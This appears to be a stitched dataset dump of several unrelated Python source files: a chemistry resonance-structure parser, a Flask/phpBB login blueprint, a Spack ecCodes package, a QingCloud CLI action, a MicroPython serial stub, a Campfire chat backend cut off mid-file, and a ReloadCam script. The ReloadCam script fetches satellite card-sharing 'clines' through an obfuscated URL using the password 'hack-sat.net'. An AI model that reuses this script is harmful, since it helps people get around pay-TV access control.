self.make_aichannels() # compile services and send away
return 0
|
gpl-3.0
| 2,982,232,896,375,325,000 | 45.240773 | 195 | 0.520505 | false | 3.634618 | false | false | false |
mtthwflst/terse
|
Parsers/NRT.py
|
1
|
24648
|
if __name__ == "__main__":
import sys,os
selfname = sys.argv[0]
full_path = os.path.abspath(selfname)[:]
last_slash = full_path.rfind('/')
dirpath = full_path[:last_slash] + '/..'
print "Append to PYTHONPATH: %s" % (dirpath)
sys.path.append(dirpath)
import copy, string
import math
import numpy
import time,re,logging
from math import sqrt
from Tools import web
from Tools.BetterFile import BetterFile
from Top import Top
from Containers import Topology, AtomicProps
log = logging.getLogger(__name__)
class bondM(Top):
"""
This class represents a resonance structure
"""
def __init__(self, nA, symbols, data, name=''):
self.symbols = symbols
self.data = data
self.name = name
if self.symbols == []:
for i in range(nA):
self.symbols.append("")
if self.data == []:
for i in range(nA):
tmp = []
for j in range(nA):
tmp.append(0)
self.data.append(tmp)
self.wg = 0.0
"""
*
"""
def __getitem__(self,key):
return self.data[key]
"""
*
"""
def __lt__(self, other):
return self.wg < other.wg
"""
*
"""
def __eq__(self, other, CheckSymbols = True):
"""
:param CheckSymbols: If selected, additional check for chemical elements symbols matching will be performed
"""
if CheckSymbols:
match = True
for i in range(len(self.symbols)):
if (self.symbols[i] != other.symbols[i]) \
and (self.symbols[i].upper() != 'X') \
and (other.symbols[i].upper() != 'X'):
match = False
break
if not match:
return False
i = 0
for i in range(len(self.data)):
for j in range(len(self.data[i])):
if self.data[i][j] != other.data[i][j]:
return False
return True
"""
*
"""
def __sub__(self,other, CheckSymbols = False):
diff = copy.deepcopy(self)
"""
Subtracts two connectivity matrices
:param CheckSymbols: If selected, additional check for chemical elements symbols matching will be performed
:return: a new matrix with difference
:rtype: an object of class bondM
"""
if CheckSymbols and (self.symbols != other.symbols):
return False
for i in range(len(self.data)):
for j in range(len(self.data[i])):
diff[i][j] = self[i][j] - other[i][j]
return diff
"""
*
"""
def __add__(self,other, CheckSymbols = False):
sm = copy.deepcopy(self)
"""
Adds two connectivity matrices
:param CheckSymbols: If selected, additional check for chemical elements symbols matching will be performed
:return: a new matrix with sums
:rtype: an object of class bondM
"""
if CheckSymbols and (self.symbols != other.symbols):
return False
for i in range(len(self.data)):
for j in range(len(self.data[i])):
sm[i][j] = self[i][j] + other[i][j]
return sm
"""
*
"""
def __str__(self):
return self.as_matrix()
"""
*
"""
def as_matrix(self):
"""
:returns: a string with resonance structure in matrix format
:rtype: str
"""
nA = len(self.data)
tStr = " "
for i in range(len(self.data)):
tStr += " % 3s" % (self.symbols[i])
tStr += "\n"
tStr += " "
for i in range(len(self.data)):
tStr += " % 3i" % (i+1)
tStr += "\n"
tStr += " "
for i in range(len(self.data)):
tStr += " ---"
tStr += "\n"
for i in range(len(self.data)):
tStr += "%s% 3i | " % (self.symbols[i], i+1)
for b in self.data[i]:
if b == 0:
tStr += " . "
else:
tStr += " %1i " % (b)
tStr += "\n"
return tStr
"""
*
"""
def offDiag(self):
"""
:returns: only off-diagonal elements thus removing information about lone pairs
:rtype: Instance of class bondM
"""
od = copy.deepcopy(self)
for i in range(len(od.data)):
od.data[i][i] = 0
return od
"""
*
"""
def offDiagEQ(self, other):
if self.symbols != other.symbols:
return False
i = 0
for i in range(len(self.data)):
for j in range(len(self.data)):
if i == j:
continue
if self.data[i][j] != other[i][j]:
return False
return True
"""
*
"""
def subset(self, subset):
"""
:param subset: a list of indices of selected atoms
:returns: a submatrix, which is a matrix including only selected atoms
:rtype: instance of class bondM
"""
nA = len(self.data)
# curiously enough, we need to explicitly provide optional empty data, otherwise it will copy the data of the
# current instance!
smallM = bondM(len(subset),symbols = [], data =[])
for i in range(len(subset)):
smallM.symbols[i] = self.symbols[subset[i]-1]
for j in range(len(subset)):
smallM[i][j] = self.data[subset[i]-1][subset[j]-1]
return smallM
"""
*
"""
def as_lines(self,wrap=False):
"""
Return a bond matrix in format compatible with $CHOOSE, $NRTSTR groups
"""
mt = self.data
nA = len(self.data)
s = " STR !"
if self.name:
s += " name="+self.name+','
s+= " weight="+str(self.wg)+','
s+= " symbols="+self.writeSymbols()
s += "\n LONE"
for i in range(nA):
if mt[i][i] > 0:
s = s + " %i %i" % (i+1,mt[i][i])
s = s + " END\n BOND "
counter = 0
for i in range(nA):
for j in range(i+1,nA):
if mt[i][j] == 1:
s = s + " S %i %i" % (i+1,j+1)
counter += 1
if wrap and (counter % 10 == 0):
s = s+ "\n "
if mt[i][j] == 2:
s = s + " D %i %i" % (i+1,j+1)
counter += 1
if wrap and (counter % 10 == 0):
s = s+ "\n "
if mt[i][j] == 3:
s = s + " T %i %i" % (i+1,j+1)
counter += 1
if wrap and (counter % 10 == 0):
s = s+ "\n "
s = s + " END\n END\n"
return s
"""
*
"""
def as_choose(self,wrap=False):
"""
Return a bond matrix in format compatible with $CHOOSE, $NRTSTR groups
"""
mt = self.data
nA = len(self.data)
s = " LONE"
for i in range(nA):
if mt[i][i] > 0:
s = s + " %i %i" % (i+1,mt[i][i])
s = s + " END\n BOND "
counter = 0
for i in range(nA):
for j in range(i+1,nA):
if mt[i][j] == 1:
s = s + " S %i %i" % (i+1,j+1)
counter += 1
if wrap and (counter % 10 == 0):
s = s+ "\n "
if mt[i][j] == 2:
s = s + " D %i %i" % (i+1,j+1)
counter += 1
if wrap and (counter % 10 == 0):
s = s+ "\n "
if mt[i][j] == 3:
s = s + " T %i %i" % (i+1,j+1)
counter += 1
if wrap and (counter % 10 == 0):
s = s+ "\n "
s = s + " END\n"
return s
"""
*
"""
def applyMatrix(self, matrix, row=0 ,col=0):
"""
Implements elements of a matrix into self. See source for detailed example
"""
"""
A.data = X X X X X, B = Y Y, row=1,col=1 A.data = X X X X X
X X X X X Y Y A.applyMatrix(B,1,1) => X Y Y X X
X X X X X X Y Y X X
X X X X X X X X X X
X X X X X X X X X X
"""
nX = len(matrix)
nY = len(matrix[0])
for i in range(nX):
for j in range(nY):
self.data[row+i][col+j] = matrix[i][j]
"""
*
"""
def applySubset(self, other, subset):
"""
Updates connectivity matrix for atoms in subset with connectivity matrix given in object of class bondM
"""
for i in range(len(subset)):
for j in range(len(subset)):
self.data[subset[i]-1][subset[j]-1] = other.data[i][j]
"""
*
"""
def writeSymbols(self):
"""
converts the list of chemical symbols into string
"""
s = ''
for Symbol in self.symbols:
if s:
s += ' '
if Symbol == '':
s += '-'
else:
s += Symbol
return s
"""
*
"""
def applyStringSymbols(self,s):
"""
converts the a string with chemical symbols into list and applies it to the object
"""
syms = s.split(' ')
for i in range(len(syms)):
if syms[i]=='-':
syms[i]=''
self.symbols = syms
"""
*
"""
def diffColor(self,other):
"""
Compares self and other matrices.
The result is a string representing a difference matrix. The elements that differ are highlighted.
"""
nA = len(self.data)
tStr = " "
for i in range(len(self.data)):
tStr += " % 3s" % (self.symbols[i])
tStr += "\n"
tStr += " "
for i in range(len(self.data)):
tStr += " % 3i" % (i+1)
tStr += "\n"
tStr += " "
for i in range(len(self.data)):
tStr += " ---"
tStr += "\n"
for i in range(len(self.data)):
tStr += "%s% 3i | " % (self.symbols[i], i+1)
for j in range(len(self.data[i])):
if self.data[i][j] != other[i][j]:
tStr += '\033[1;31m'
if self.data[i][j] == 0:
tStr += " . "
else:
tStr += " %1i " % (self.data[i][j])
if self.data[i][j] != other[i][j]:
tStr += '\033[0;00m'
tStr += "\n"
return tStr
"""
*
"""
def pic(self,filename,picformat='svg'):
"""
Generates a graphical file with 2D-representation of the resonance structure
"""
try:
import openbabel as ob
except:
print "Cannot import openbabel"
return
#ValEl = {'H':1, 'B':3,'C':4,'N':5,'O':6,'F':7,'S':6}
#ValEl = {'1':1, '5':3,'6':4,'7':5,'8':6,'9':7,'16':6}
# Import Element Numbers
ati = []
Sym2Num = ob.OBElementTable()
for a in self.symbols:
ElNum = Sym2Num.GetAtomicNum(a)
ati.append(ElNum)
# Import connections
conn = self.data
mol = ob.OBMol()
# Create atoms
for a in ati:
at = ob.OBAtom()
at.SetAtomicNum(a)
mol.AddAtom(at)
# Create connections
val = []
total_LP = 0
for i in range(len(conn)):
total_LP += conn[i][i]
for i in range(len(conn)):
val.append(conn[i][i] * 2)
for j in range(i):
if conn[i][j]==0:
continue
val[i] += conn[i][j]
val[j] += conn[i][j]
atA = mol.GetAtomById(i)
atB = mol.GetAtomById(j)
b = ob.OBBond()
b.SetBegin(atA)
b.SetEnd(atB)
b.SetBO(int(conn[i][j]))
mol.AddBond(b)
for i in range(len(conn)):
atA = mol.GetAtomById(i)
atAN = atA.GetAtomicNum()
FormValEl = CountValenceEl(atAN)
#if total_LP == 0:
# if atAN == 1:
# FullShell = 2
# else:
# FullShell = 8
# FormCharge = FormValEl + int(val[i]) - FullShell
#else:
FormCharge = int(FormValEl - val[i])
#print "atAN, FormValEl, val[i], FullShell"
#print atAN, FormValEl, val[i], FullShell
#FormCharge = FormCharge % 2
atA.SetFormalCharge(FormCharge)
# Export file
mol.DeleteNonPolarHydrogens()
conv = ob.OBConversion()
conv.SetOutFormat(picformat)
conv.AddOption('C')
conv.WriteFile(mol,filename)
#print val
#c2 = ob.OBConversion()
#c2.SetOutFormat('mol2')
#print c2.WriteString(mol)
def CountValenceEl(x):
"""
Returns a number of valence electrons among the x electrons.
"""
x = int(x)
nmax = int(sqrt(x/2))
val = x
for i in range(nmax+1):
n = 2*i*i
if n < val:
val -= n
return val
class NRT(Top):
"""
This class represents a collection of resonance structures.
"""
def __init__(self):
self.FI = None
self.options = ''
self.NBO_version = ''
self.structures = []
self.symbols = []
def parse(self):
if self.FI:
FI = self.FI
else:
FI = BetterFile(self.file)
def read(self, fInp='',fType=''):
if fType=='matrix':
self.read_matrix(fInp)
elif fType=='lines':
self.read_lines(fInp)
elif not self.read_matrix(fInp):
self.read_lines(fInp)
def __str__(self):
return self.as_lines()
def __len__(self):
return len(self.structures)
def __getitem__(self,key):
return self.structures[key]
def write(self,file):
f = open(file,'w')
f.write(str(self))
f.close()
def sortByWg(self):
"""
Sorts resonance structures by weight in descending order
"""
self.structures = sorted(self.structures, key = lambda k: k.wg, reverse = True)
def as_lines(self):
"""
Returns a string with resonance structures written as in the end of .nbout file
"""
s = " $NRTSTR\n"
if self.symbols:
s = s + " !SYMBOLS " + str(self.symbols) + "\n"
for rs in self.structures:
s = s + rs.as_lines()
return s + " $END\n"
"""
*
"""
def totalWg(self):
"""
Returns sum of weights of resonance structures
"""
sm = 0
for mtrx in self.structures:
sm += mtrx.wg
return sm
"""
*
"""
def byName(self,name):
"""
Returns a resonance structure (instance of class bondM) with a given name
"""
for rs in self.structures:
if rs.name == name:
return rs
"""
*
"""
def patternsOfSubset(self,subset,OffDiag = False):
"""
Returns connectivity patterns for a given subset of atoms.
Weights of these patterns are calculated.
"""
Patterns = SetOfResStr()
for i_mtrx in range(len(self.structures)):
mtrx = self.structures[i_mtrx]
if OffDiag:
currMat = mtrx.subset(subset).offDiag()
else:
currMat = mtrx.subset(subset)
if currMat in Patterns.structures:
i = Patterns.structures.index(currMat)
Patterns.structures[i].wg += mtrx.wg
Patterns.structures[i].indices.append(i_mtrx)
else:
Patterns.structures.append(currMat)
Patterns.structures[-1].wg = mtrx.wg
Patterns.structures[-1].indices = [i_mtrx,]
"""
for mtrx in self.structures:
if OffDiag:
currMat = mtrx.subset(subset).offDiag()
else:
currMat = mtrx.subset(subset)
if currMat in Patterns.structures:
i = Patterns.structures.index(currMat)
Patterns.structures[i].wg += mtrx.wg
else:
Patterns.structures.append(currMat)
Patterns.structures[-1].wg = mtrx.wg
"""
return Patterns
"""
*
"""
def getWeights(self,NBO_RS):
"""
Updates weights of reference structures, if they are found in NBO_RS
:param NBO_RS: an object of class SetOfResStr, where resonance structures will be looked for.
"""
for mtrx in self.structures:
mtrx.wg = 0
if mtrx in NBO_RS.structures:
iPat = NBO_RS.structures.index(mtrx)
mtrx.wg = NBO_RS.structures[iPat].wg
mtrx.indices = NBO_RS.structures[iPat].indices
"""
*
"""
def offDiag(self):
"""
Returns an instance of SetOfResStr class with zeroed diagonal elements of resonance structure matrices
(in other words, with lone pairs removed)
"""
od = copy.deepcopy(self)
for i in range(len(self.structures)):
od.structures[i] = self.structures[i].offDiag()
return od
"""
*
"""
def read_matrix(self,fInp = ''):
"""
Reading the resonance structs. This can handle split TOPO matrices determine the number of atoms
"""
if fInp:
try:
inp = open(fInp,'r')
except:
print '[Warning]: cannot open %s' % (fInp)
return
else:
inp = sys.stdin
s = inp.readline()
while s:
if "Atom distance matrix:" in s:
break
s = inp.readline()
inp.readline()
inp.readline()
inp.readline()
nAtoms = 0
s = inp.readline()
while s:
# atom numbers go like "1." so they must convert into a float, if not then we are done
try:
float(s.split()[0])
except:
break
nAtoms += 1
s = inp.readline()
# read the main structure
main = bondM(nAtoms,[],[])
s = inp.readline()
while s:
if "TOPO matrix for" in s:
break
s = inp.readline()
inp.readline()
atomsPerLine = len(inp.readline().split()) -1
nPasses = int(math.ceil(float(nAtoms)/atomsPerLine))
inp.readline()
for aPass in range(nPasses):
for i in range(nAtoms):
L = inp.readline().split()
main.symbols[i]=L[1]
for j in range(len(L)-2):
main[i][aPass*atomsPerLine+j] = int(L[j+2])
if aPass < nPasses - 1:
inp.readline()
inp.readline()
inp.readline()
s = inp.readline()
while s:
if "---------------------------" in s:
break
s = inp.readline()
# here comes the parsing of the other structs
# the main first , just the %
line = inp.readline()
try:
main.wg = float(line[10:17])
except:
return False
struct_lns = []
line = inp.readline()
while line:
if "---------------------------" in line:
break
if line[4] == " ":
struct_lns[-1] += line.strip("\n")[18:]
else:
struct_lns.append(line.strip("\n"))
line = inp.readline()
allStructs = []
allStructs.append(main)
for tStr in struct_lns:
tmpM = copy.deepcopy(main)
tmpM.wg = float(tStr[10:17])
#print tStr
dontInclude = False
for mod in tStr[18:].split(','):
mod = mod.strip()
if len(mod.split()) == 0:
dontInclude = True
break
increment = 0
if mod[0] == "(":
increment -= 1
aList = mod.strip("()").split("-")
else:
increment += 1
aList = mod.split("-")
aL2 = []
for aL in aList:
aL2.append(int(aL.strip(string.letters+" "))-1)
if len(aL2) == 2:
tmpM[aL2[0]][aL2[1]] += increment
tmpM[aL2[1]][aL2[0]] += increment
elif len(aL2) == 1:
tmpM[aL2[0]][aL2[0]] += increment
if not dontInclude:
allStructs.append(tmpM)
self.structures = allStructs
if allStructs:
return True
else:
return False
#
# Done reading the reson structs.
#
"""
*
"""
def read_lines(self,fInp=''):
"""
Reads NRT strings given in the format of $NRTSTR, $CHOOSE groups
"""
allStructs = []
if fInp:
inp = open(fInp,'r')
else:
inp = sys.stdin
BondTypes = {'S':1,'D':2,'T':3}
NAtoms = 0
inside = False
while True:
s = inp.readline().strip('\n')
if not s:
break
if "$END" in s:
continue
if "STR" in s:
inside = True
LP, Bonds, props = {}, {}, {}
if "!" in s:
all_params = s.split('!')[1]
for param in all_params.split(','):
name_value = param.split('=')
if len(name_value)>1:
props[name_value[0].strip()] = name_value[1].strip()
continue
if inside and "LONE" in s:
tmp = s.split()
for i in range(1,len(tmp)-1,2):
LP[tmp[i]] = tmp[i+1]
NAtoms = max(NAtoms,int(tmp[i]))
#print "Lone Pairs:\n",LP
continue
if inside and "BOND" in s:
tmp = s.split()
for i in range(1,len(tmp)-1,3):
#print tmp,i
#print tmp[i],tmp[i+1],tmp[i+2]
BondType, smaller, higher = tmp[i], tmp[i+1],tmp[i+2]
NAtoms = max(NAtoms,int(higher))
if not higher in Bonds:
Bonds[higher] = {}
Bonds[higher][smaller]=BondType
continue
if "END" in s:
inside = False
# Fill data
data = numpy.zeros((NAtoms,NAtoms))
for i in LP:
data[int(i)-1,int(i)-1] = LP[i]
for i in Bonds:
for j in Bonds[i]:
ii = int(i) -1
jj = int(j) -1
data[ii,jj] = BondTypes[Bonds[i][j]]
data[jj,ii] = data[ii,jj]
ResStr = bondM(NAtoms,symbols=[],data=data)
if 'name' in props:
ResStr.name = props['name']
if 'symbols' in props:
ResStr.applyStringSymbols(props['symbols'])
if 'weight' in props:
ResStr.wg = float(props['weight'])
allStructs.append(ResStr)
self.structures = allStructs
if __name__ == "__main__":
DebugLevel = logging.DEBUG
logging.basicConfig(level=DebugLevel)
from Settings import Settings
Top.settings = Settings(FromConfigFile = True)
f = NRT()
f.file = sys.argv[1]
f.parse()
print f
|
mit
| 3,443,818,888,662,613,500 | 28.625 | 117 | 0.438737 | false | 3.880353 | false | false | false |
ser/topitup
|
login_bp.py
|
1
|
3595
|
# Flask modules
from flask import (
Blueprint,
render_template,
redirect,
url_for,
request,
flash,
g
)
# FLask Login
from flask_login import (
login_user,
logout_user,
current_user
)
# WTForms
from flask_wtf import Form, RecaptchaField
from wtforms import StringField, SubmitField, PasswordField, BooleanField
from wtforms.validators import DataRequired
# Import password / encryption helper tools
# AVOID flask-bcrypt extension, it does not work with python 3.x
import bcrypt
# our own modules
from topitup import db
from nav import (
nav,
top_nav
)
# Let's start!
login_bp = Blueprint('login_bp', __name__)
# Structure of User data located in phpBB
class User(db.Model):
__tablename__ = "phpbb_users"
id = db.Column('user_id', db.Integer, primary_key=True)
username = db.Column('username_alias', db.String(63),
unique=True, index=True)
password = db.Column('user_password', db.String(255))
email = db.Column('user_email', db.String(100), unique=True, index=True)
posts = db.Column('user_posts', db.Integer)
avatar = db.Column('user_avatar', db.String(255))
neuro = db.Column('neuro', db.Numeric(12, 2))
def __init__(self, username, password, email, posts, avatar, neuro):
self.username = username
self.password = password
self.email = email
self.posts = posts
self.avatar = avatar
self.neuro = neuro
def is_authenticated(self):
return True
def is_active(self):
return True
def is_anonymous(self):
return False
def get_id(self):
return self.id
def __repr__(self):
return '<User %r>' % (self.username)
# Login Form
class LoginForm(Form):
username = StringField('Username', validators=[DataRequired()])
password = PasswordField('Password', validators=[DataRequired()])
remember_me = BooleanField('Remember me')
recaptcha = RecaptchaField('Spam protection')
submit = SubmitField("Log me in")
@login_bp.before_request
def before_request():
try:
g.user = current_user.username.decode('utf-8')
g.email = current_user.email.decode('utf-8')
# amount of Credits in user's account
g.credits = current_user.neuro
g.user_id = current_user.id
except:
g.user = None
g.credits = None
nav.register_element('top_nav', top_nav(g.user, g.credits))
@login_bp.route('/login', methods=('GET', 'POST'))
def index():
form = LoginForm()
if form.validate_on_submit():
username = request.form['username']
password = request.form['password']
password = password.encode('utf-8') # required by bcrypt
remember_me = False
if 'remember_me' in request.form:
remember_me = True
try:
sql_user_query = User.query.filter_by(username=username).first()
pwhash = sql_user_query.password.decode('utf-8')
pwhash = pwhash.encode('utf-8') # required by bcrypt
userid = sql_user_query.id
if userid and bcrypt.hashpw(password, pwhash) == pwhash:
login_user(sql_user_query, remember=remember_me)
flash('Logged in successfully', 'info')
return redirect('/')
except:
flash('Username or Password is invalid', 'error')
return redirect('/login')
return render_template('login.html', form=form)
@login_bp.route('/logout')
def logout():
logout_user()
return redirect(url_for('frontend.index'))
|
agpl-3.0
| 2,974,913,591,940,286,500 | 26.234848 | 76 | 0.624478 | false | 3.71001 | false | false | false |
lgarren/spack
|
var/spack/repos/builtin/packages/eccodes/package.py
|
1
|
4223
|
##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, [email protected], All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
#
from spack import *
class Eccodes(CMakePackage):
"""ecCodes is a package developed by ECMWF for processing meteorological
data in GRIB (1/2), BUFR (3/4) and GTS header formats."""
homepage = "https://software.ecmwf.int/wiki/display/ECC/ecCodes+Home"
url = "https://software.ecmwf.int/wiki/download/attachments/45757960/eccodes-2.2.0-Source.tar.gz?api=v2"
list_url = "https://software.ecmwf.int/wiki/display/ECC/Releases"
version('2.5.0', '5a7e92c58418d855082fa573efd352aa')
version('2.2.0', 'b27e6f0a3eea5b92dac37372e4c45a62')
variant('netcdf', default=False,
description='Enable GRIB to NetCDF conversion tool')
variant('jp2k', default='openjpeg', values=('openjpeg', 'jasper', 'none'),
description='Specify JPEG2000 decoding/encoding backend')
variant('png', default=False,
description='Enable PNG support for decoding/encoding')
variant('aec', default=False,
description='Enable Adaptive Entropy Coding for decoding/encoding')
variant('pthreads', default=False,
description='Enable POSIX threads')
variant('openmp', default=False,
description='Enable OpenMP threads')
variant('memfs', default=False,
description='Enable memory based access to definitions/samples')
variant('python', default=False,
description='Enable the Python interface')
variant('fortran', default=True, description='Enable the Fortran support')
variant('build_type', default='RelWithDebInfo',
description='The build type to build',
values=('Debug', 'Release', 'RelWithDebInfo', 'Production'))
depends_on('netcdf', when='+netcdf')
depends_on('openjpeg', when='jp2k=openjpeg')
depends_on('jasper', when='jp2k=jasper')
depends_on('libpng', when='+png')
depends_on('libaec', when='+aec')
depends_on('python@:2', when='+python')
depends_on('py-numpy', when='+python', type=('build', 'run'))
extends('python', when='+python')
conflicts('+openmp', when='+pthreads',
msg='Cannot enable both POSIX threads and OMP')
# The following enforces linking against the specified JPEG2000 backend.
patch('enable_only_openjpeg.patch', when='jp2k=openjpeg')
patch('enable_only_jasper.patch', when='jp2k=jasper')
def cmake_args(self):
variants = ['+netcdf', '+png', '+aec', '+pthreads',
'+openmp', '+memfs', '+python', '+fortran']
options = ['NETCDF', 'PNG', 'AEC', 'ECCODES_THREADS',
'ECCODES_OMP_THREADS', 'MEMFS', 'PYTHON', 'FORTRAN']
args = map(lambda var, opt:
"-DENABLE_%s=%s" %
(opt, 'ON' if var in self.spec else 'OFF'),
variants,
options)
if self.spec.variants['jp2k'].value == 'none':
args.append('-DENABLE_JPG=OFF')
else:
args.append('-DENABLE_JPG=ON')
return args
|
lgpl-2.1
| 7,285,572,141,602,078,000 | 43.925532 | 113 | 0.636514 | false | 3.79425 | false | false | false |
DaggerES/ReloadCam
|
DELETED_ReloadCam_Server_Kacsat.py
|
1
|
1301
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#Refrescador automatico de clines
#Creado por Dagger - https://github.com/gavazquez
import ReloadCam_Main, ReloadCam_Helper
def GetVersion():
return 3
#Filename must start with Server, classname and argument must be the same!
class Kacsat(ReloadCam_Main.Server):
def GetUrl(self):
#Pon un breakpoint aqui si quieres ver la URL verdadera ;)
#http://kac-sat.noip.me/index.php
realUrl = ReloadCam_Helper.Decrypt("maanpH1wfN3Gz5zUxaVgoaOssXvfypvYz8iWqmGkq7E=")
return realUrl
def GetClines(self):
print "Now getting Kacsat clines!"
kacsatClines = []
kacsatClines.append(self.__GetKacsatCline())
kacsatClines = filter(None, kacsatClines)
if len(kacsatClines) == 0: print "No Kacsat lines retrieved"
return kacsatClines
def __GetKacsatCline(self):
values= {
'user': ReloadCam_Helper.GetMyIP(),
'pass': 'hack-sat.net',
'submit':'Active+User%21'
}
htmlCode = ReloadCam_Helper.GetPostHtmlCode(values, None, self.GetUrl())
cline = ReloadCam_Helper.FindStandardClineInText(htmlCode)
if cline != None and ReloadCam_Helper.TestCline(cline):
return cline
return None
|
gpl-3.0
| 1,889,748,658,797,407,500 | 30.731707 | 90 | 0.652575 | false | 3.142512 | false | false | false |
yunify/qingcloud-cli
|
qingcloud/cli/iaas_client/actions/lb/modify_loadbalancer_backend_attributes.py
|
1
|
2590
|
# =========================================================================
# Copyright 2012-present Yunify, Inc.
# -------------------------------------------------------------------------
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this work except in compliance with the License.
# You may obtain a copy of the License in the LICENSE file, or at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =========================================================================
from qingcloud.cli.iaas_client.actions.base import BaseAction
class ModifyLoadBalancerBackendAttributesAction(BaseAction):
action = 'ModifyLoadBalancerBackendAttributes'
command = 'modify-loadbalancer-backend-attributes'
usage = '%(prog)s -b <lb_backend> [-p <port> -w <weight> -f <conf_file>]'
description = 'Modify load balancer backend attributes.'
@classmethod
def add_ext_arguments(cls, parser):
parser.add_argument('-b', '--lb_backend', dest='lb_backend',
action='store', type=str, default='',
help='the ID of load balancer backend.')
parser.add_argument('-p', '--port', dest='port',
action='store', type=int, default=None,
help='the backend port.')
parser.add_argument('-w', '--weight', dest='weight',
action='store', type=int, default=None,
help='the backend weight, valid value is from 1 to 100.')
parser.add_argument('--disabled', dest='disabled',
action='store', type=int, default=None,
help='disable this backend or not, 0: enable, 1: disable.')
parser.add_argument('-N', '--name', dest='name',
action='store', type=str, default=None,
help='new backend name')
@classmethod
def build_directive(cls, options):
if not options.lb_backend:
print('error: backend should be specified')
return None
return {
'loadbalancer_backend': options.lb_backend,
'loadbalancer_backend_name': options.name,
'port': options.port,
'weight': options.weight,
'disabled': options.disabled,
}
|
apache-2.0
| -2,008,896,815,739,194,600 | 41.459016 | 77 | 0.57027 | false | 4.64991 | false | false | false |
mbuesch/pyprofibus
|
stublibs/serial.py
|
1
|
2414
|
from pyprofibus.compat import *
import time
PARITY_EVEN = "E"
PARITY_ODD = "O"
STOPBITS_ONE = 1
STOPBITS_TWO = 2
class SerialException(Exception):
pass
class Serial(object):
def __init__(self):
self.__isMicropython = isMicropython
self.port = "/dev/ttyS0"
self.__portNum = None
self.baudrate = 9600
self.bytesize = 8
self.parity = PARITY_EVEN
self.stopbits = STOPBITS_ONE
self.timeout = 0
self.xonxoff = False
self.rtscts = False
self.dsrdtr = False
self.__lowlevel = None
def open(self):
if self.__isMicropython:
port = self.port
for sub in ("/dev/ttyS", "/dev/ttyUSB", "/dev/ttyACM", "COM", "UART", ):
port = port.replace(sub, "")
try:
self.__portNum = int(port.strip())
except ValueError:
raise SerialException("Invalid port: %s" % self.port)
try:
import machine
self.__lowlevel = machine.UART(
self.__portNum,
self.baudrate,
self.bytesize,
0 if self.parity == PARITY_EVEN else 1,
1 if self.stopbits == STOPBITS_ONE else 2)
print("Opened machine.UART(%d)" % self.__portNum)
except Exception as e:
raise SerialException("UART%d: Failed to open:\n%s" % (
self.__portNum, str(e)))
return
raise NotImplementedError
def close(self):
if self.__isMicropython:
try:
if self.__lowlevel is not None:
self.__lowlevel.deinit()
self.__lowlevel = None
print("Closed machine.UART(%d)" % self.__portNum)
except Exception as e:
raise SerialException("UART%d: Failed to close:\n%s" % (
self.__portNum, str(e)))
return
raise NotImplementedError
def write(self, data):
if self.__isMicropython:
try:
self.__lowlevel.write(data)
except Exception as e:
raise SerialException("UART%d write(%d bytes) failed: %s" % (
self.__portNum, len(data), str(e)))
return
raise NotImplementedError
def read(self, size=1):
if self.__isMicropython:
try:
data = self.__lowlevel.read(size)
if data is None:
return b""
return data
except Exception as e:
raise SerialException("UART%d read(%d bytes) failed: %s" % (
self.__portNum, size, str(e)))
raise NotImplementedError
def flushInput(self):
if self.__isMicropython:
while self.__lowlevel.any():
self.__lowlevel.read()
return
raise NotImplementedError
def flushOutput(self):
if self.__isMicropython:
time.sleep(0.01)
return
raise NotImplementedError
|
gpl-2.0
| 8,178,868,719,447,884,000 | 23.886598 | 75 | 0.652444 | false | 2.976572 | false | false | false |
bolshoibooze/err
|
errbot/backends/campfire.py
|
1
|
4381
|
import logging
import sys
from errbot.backends.base import Message, build_message
from errbot.errBot import ErrBot
from threading import Condition
log = logging.getLogger(__name__)
try:
import pyfire
except ImportError:
log.exception("Could not start the campfire backend")
log.fatal("""
If you intend to use the campfire backend please install pyfire:
pip install pyfire
""")
sys.exit(-1)
class CampfireConnection(pyfire.Campfire):
rooms = {} # keep track of joined room so we can send messages directly to them
def join_room(self, name, msg_callback, error_callback):
room = self.get_room_by_name(name)
room.join()
stream = room.get_stream(error_callback=error_callback)
stream.attach(msg_callback).start()
self.rooms[name] = (room, stream)
ENCODING_INPUT = sys.stdin.encoding
class CampfireIdentifier(object):
def __init__(self, user):
self._user = user # it is just one room for the moment
@property
def user(self):
return self._user
class CampfireBackend(ErrBot):
exit_lock = Condition()
def __init__(self, config):
super(CampfireBackend, self).__init__(config)
identity = config.BOT_IDENTITY
self.conn = None
self.subdomain = identity['subdomain']
self.username = identity['username']
self.password = identity['password']
if not hasattr(config, 'CHATROOM_PRESENCE') or len(config['CHATROOM_PRESENCE']) < 1:
raise Exception('Your bot needs to join at least one room, please set'
' CHATROOM_PRESENCE with at least a room in your config')
self.chatroom = config.CHATROOM_PRESENCE[0]
self.room = None
self.ssl = identity['ssl'] if 'ssl' in identity else True
self.bot_identifier = None
def send_message(self, mess):
super(CampfireBackend, self).send_message(mess)
self.room.speak(mess.body) # Basic text support for the moment
def serve_forever(self):
self.exit_lock.acquire()
self.connect() # be sure we are "connected" before the first command
self.connect_callback() # notify that the connection occured
try:
log.info("Campfire connected.")
self.exit_lock.wait()
except KeyboardInterrupt:
pass
finally:
self.exit_lock.release()
self.disconnect_callback()
self.shutdown()
def connect(self):
if not self.conn:
self.conn = CampfireConnection(self.subdomain, self.username, self.password, self.ssl)
self.bot_identifier = self.build_identifier(self.username)
self.room = self.conn.get_room_by_name(self.chatroom).name
# put us by default in the first room
# resource emulates the XMPP behavior in chatrooms
